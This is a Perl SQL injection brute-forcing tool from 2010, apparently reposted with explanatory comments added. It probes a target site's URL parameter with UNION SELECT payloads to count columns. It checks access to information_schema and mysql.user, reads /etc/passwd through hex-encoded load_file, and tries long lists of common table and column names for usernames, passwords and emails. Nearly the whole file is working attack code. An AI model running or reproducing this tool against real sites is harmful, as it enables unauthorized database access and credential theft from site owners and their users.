sqli_brute.pl

1. #!/usr/bin/perl
2.  
3. # Use the "Simple" module from "LWP" lib
4. # More info: http://search.cpan.org/~gaas/libwww-perl-6.04/lib/LWP.pm
5. use LWP::Simple;
6.  
7. # Check if we have a third argument, exit if not found
8. # (first argument is 0, and it is not the script as you would expect)
9. if(!$ARGV[2]) {
10.     print "\n\n[+] SQL Injection bruteforce By Bl4k3 -[+]-\n=========================================";
11.     print "\n\nUse: perl $0 [WEBSITE] [COLUMNS] [FILE] [COMMENT] [-T] [-C] [-NOCHECK]\n";
12.     print "\n[WEBSITE]: http://www.web.com/index.php?id=\n[COLUMNS]: Limit of columns to check\n[FILE]: File where save the results\n[COMMENT]: '/*' o '--' (Without '') (Optional)\n[-T]: Try to brute force tables (Optional)\n[-C]: Try to brute force columns (Optional)\n[-NOCHECK]: Skip the initial check (Optional)\n\n";
13.     exit (0);
14. }
15.  
16. # Array to hold the usual table names to check for
17. @nombretabla=('admin','tblUsers','tblAdmin','user','users','username','usernames','usuario',
18.     'name','names','nombre','nombres','usuarios','member','members','admin_table',
19.     'miembro','miembros','membername','admins','administrator',
20.     'administrators','passwd','password','passwords','pass','Pass',
21.     'tAdmin','tadmin','user_password','user_passwords','user_name','user_names',
22.     'member_password','mods','mod','moderators','moderator','user_email',
23.     'user_emails','user_mail','user_mails','mail','emails','email','address',
24.     'e-mail','emailaddress','correo','correos','phpbb_users','log','logins',
25.     'login','registers','register','usr','usrs','ps','pw','un','u_name','u_pass',
26.     'tpassword','tPassword','u_password','nick','nicks','manager','managers','administrador',
27.     'tUser','tUsers','administradores','clave','login_id','pwd','pas','sistema_id',
28.     'sistema_usuario','sistema_password','contrasena','auth','key','senha',
29.     'tb_admin','tb_administrator','tb_login','tb_logon','tb_members_tb_member',
30.     'tb_users','tb_user','tb_sys','sys','fazerlogon','logon','fazer','authorization',
31.     'membros','utilizadores','staff','nuke_authors','accounts','account','accnts',
32.     'associated','accnt','customers','customer','membres','administrateur','utilisateur',
33.     'tuser','tusers','utilisateurs','password','amministratore','god','God','authors',
34.     'asociado','asociados','autores','membername','autor','autores','Users','Admin','Members',
35.     'Miembros','Usuario','Usuarios','ADMIN','USERS','USER','MEMBER','MEMBERS','USUARIO','USUARIOS','MIEMBROS','MIEMBRO');
36.  
37. # Array variable to hold usual column names to check for
38. @nombrecolumna=('admin_name','log_utenti','cla_adm','usu_adm', 'sanleo','fazer','logon','fazerlogon','authorization','membros','utilizadores','sysadmin','email',
39.     'user_name','username','name','user','user_name','user_username','uname','user_uname','usern','user_usern','un','user_un','mail',
40.     'usrnm','user_usrnm','usr','usernm','user_usernm','nm','user_nm','login','u_name','nombre','login_id','usr','sistema_id','author',
41.     'sistema_usuario','auth','key','membername','nme','unme','psw','password','user_password','autores','pass_hash','hash','pass','correo',
42.     'userpass','user_pass','upw','pword','user_pword','passwd','user_passwd','passw','user_passw','pwrd','user_pwrd','pwd','authors',
43.     'user_pwd','u_pass','clave','usuario','contrasena','pas','sistema_password','autor','upassword','web_password','web_username');
44.  
45. # Check if first argument (the site URL) has the http:// prefix, if not add it
46. if ( $ARGV[0] !~ /^http:/ ) {
47.     $ARGV[0] = "http://" . $ARGV[0];
48. }
49.  
50. # Check for any other arguments and set options accordingly
51. if ($ARGV[3] =~ "--" || $ARGV[4] =~ "--" || $ARGV[5] =~ "--" || $ARGV[6] =~ "--") {
52.     $cmn.= "+";
53.     $cfin.="--";
54.     print "\n[+] Comments to use: '--' & '+'";
55. } else {
56.     $cmn.= "/**/";
57.     $cfin.= "/*";
58.     print "\n[+] Comments to use: '/*' & '/**/'";
59. }
60.  
61. # Open the website URL and save content to file (filename supplied as ARGV[2])
62. open(WEB,">>".$ARGV[2]) || die "\n\n[-] Failed creating the file\n";
63.  
64. # Verify that we mentioned we want to skip the checking and act accordingly
65. if ($ARGV[3] =~ "-NOCHECK" || $ARGV[4] =~ "-NOCHECK" || $ARGV[5] =~ "-NOCHECK" || $ARGV[6] =~ "-NOCHECK") {
66.     print "\n[!] Skipping the initial check...\n";
67.     print WEB "[WEBSITE]:\n\n$ARGV[0]\n";
68. } else {
69.     print "\n[!] Checking if the website is vulnerable...\n";
70.     # Make a SQL Injection string
71.     $sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cfin;
72.     # Request the URL with the injection string
73.     $response=get($sql)or die("[-] Wrong Website, check it\n");
74.     # Check if the webpage has sql errors and display an appropriate message
75.     # Usually when SQL query fails, an error message apears on the webpage
76.     # and because it's easyer for programmers to just let the message apear to
77.     # end users instead of logging them and displaying a generic error message
78.     # we can use these SQL query error messages to deduce if the site is
79.     # susceptible to SQL injection or not
80.     # This if block checks for various error messages using regex expressions
81.     if($response=~ /mysql_fetch_/ ||
82.     $response=~ /You have an error in your SQL syntax/ ||
83.     $response =~ /tem um erro de sintaxe no seu SQL/ ||
84.     $response =~ /mysql_num_rows/ ||
85.     $response =~ /Division by zero in/ ||
86.     $response =~ /SELECT * FROM/ ||
87.     $response =~/ / ||
88.     $response =~ /Mysql Error/ ||
89.     $response =~ /Mysql Error./ ||
90.     $response =~ /Incorrect syntax near/ ||
91.     $response =~ /[Macromedia][SQLServer JDBC Driver][SQLServer]Incorrect/ ||
92.     $response =~ /Microsoft OLE DB Provider for SQL Server/) {
93.         print "[+] Vulnerable website, script continues...\n";
94.         print WEB "[WEBSITE]:\n\n$ARGV[0]\n";
95.     } else {
96.         print "[-] Website apparently not vulnerable to SQL Inyection, try another comment\n\n";
97.         exit(1);
98.     }
99. }
100.  
101. # Well if we got this far, the site is susceptible to SQL Injection
102. # Time to look up more info
103. # I must admit since this is not my script, I don't really understand some of
104. # the choices made, regarding the logic of this script (imho could use improvements)
105. print "\n[!] Looking up columns...\n";
106. for ($column = 0 ; $column < $ARGV[1] ; $column ++) {
107.     $union.=','.$column;
108.     $inyection.=','."0x6c6f67696e70776e7a";
109.     if ($column == 0) {
110.         print WEB "\n[COLUMNS]:\n\n";
111.         $inyection = '';
112.         $union = '';
113.     }
114.     # Compose injection string then GET the injected URL
115.     $sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cfin;
116.     $response=get($sql)or die("[-] Failed to try to find the number of columns, check website\n");
117.     if($response =~ /loginpwnz/) {
118.         $column ++;
119.         print "[+] The site has $column columns\n\n";
120.         $sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cfin;
121.         print "$sql\n";
122.         print WEB "$sql\n";
123.         print "\n[!] Checking if Information_Schema exists...";
124.         # Compose injection string then GET the injected URL
125.         $sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cmn."from".$cmn."information_schema.tables".$cfin;
126.         $response=get($sql)or die("[-] Impossible to get Information_Schema\n");
127.         if($response =~ /loginpwnz/) {
128.             print "\n[+] Information_Schema available...saving in $ARGV[2]";
129.             $sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cmn."from".$cmn."information_schema.tables".$cfin;
130.             print WEB "\n\n[INFORMATION_SCHEMA]:\n\n$sql\n";
131.         } else {
132.             print "\n[-] Information_Schema unavailable";
133.         }
134.         print "\n[!] Checking if MySQL.User exists...";
135.         # Compose injection string then GET the injected URL
136.         $sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cmn."from".$cmn."mysql.user".$cfin;
137.         $response=get($sql)or die("[-] Impossible to get MySQL.User\n");
138.         if($response =~ /loginpwnz/) {
139.             print "\n[+] MySQL.User available...saving in $ARGV[2]";
140.             $sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cmn."from".$cmn."mysql.user".$cfin;
141.             print WEB "\n\n[MYSQL.USER]:\n\n$sql\n";
142.         } else {
143.             print "\n[-] MySQL.User unavailable";
144.         }
145.         while ($loadcont < $column-1) {
146.             $loadfile.=','.'load_file(0x2f6574632f706173737764)';
147.             $loadcont++;
148.         }
149.         print "\n[!] Checking if it is possible to inject LOAD_FILE...";
150.         # Compose injection string then GET the injected URL
151.         $sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."load_file(0x2f6574632f706173737764)".$loadfile.$cfin;
152.         $response=get($sql)or die("[-] Imposible inyectar LOAD_FILE\n");
153.         if($response =~ /root:x:/)
154.         {
155.             print "\n[+] LOAD_FILE available...saving in $ARGV[2]";
156.             print WEB "\n\n[LOAD_FILE]:\n\nload_file(0x2f6574632f706173737764) => OK! (0x2f6574632f706173737764 => /etc/passwd)\n";
157.         } else {
158.             print "\n[-] LOAD_FILE unavailable";
159.         }
160.         if ($ARGV[3] =~ "-T" || $ARGV[4] =~ "-T" || $ARGV[5] =~ "-T" || $ARGV[6] =~ "-T") {
161.             print "\n\n[!] Brute forcing tables...";
162.             print WEB "\n\n[TABLES]:\n\n";
163.             foreach $tabla(@nombretabla) {
164.                 chomp($tabla);
165.                 # Compose injection string then GET the injected URL
166.                 $sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cmn."from".$cmn.$tabla.$cfin;
167.                 $response=get($sql)or die("[-] Impossible to get tables\n");
168.                 if($response =~ /loginpwnz/) {
169.                     print "\n[+] Table $tabla exists...saving in $ARGV[2]";
170.                     $sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cmn."from".$cmn.$tabla.$cfin;
171.                     print WEB "$sql\n";
172.                 }
173.             }
174.         }
175.         if ($ARGV[3] =~ "-C" ||
176.         $ARGV[4] =~ "-C" ||
177.         $ARGV[5] =~ "-C" ||
178.         $ARGV[6] =~ "-C") {
179.             print "\n\n[!] Table to brute force columns: ";
180.             $tabla.='';
181.             chomp($tabla);
182.             print WEB "\n\n[COLUMNS IN TABLE $tabla]:\n\n";
183.             foreach $columna(@nombrecolumna) {
184.                 chomp($columna);
185.                 # Compose injection string then GET the injected URL
186.                 $sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."concat(0x6c6f67696e70776e7a,0x3a,$columna)".$inyection.$cmn."from".$cmn.$tabla.$cfin;
187.                 $response=get($sql)or die("[-] Impossible to get columns\n");
188.                 if ($response =~ /loginpwnz/) {
189.                     print "\n[+] Column $columna available...saving in $ARGV[2]";
190.                     print WEB "$columna\n";
191.                 }
192.             }
193.         }
194.         print WEB "\n\n\n[*EOF*]";
195.         print "\n\n[+] Everything saved correctly in $ARGV[2]\n\n";
196.         print "## c0ded by Bl4k3 | 2010 ##\n\n";
197.         exit (0);
198.     }
199. }
200. print "[-] Impossible to find number of columns, try more columns\n\n";
201. print "## c0ded by Bl4k3 , WyattLW | 2010 ##\n\n";
202. exit (0);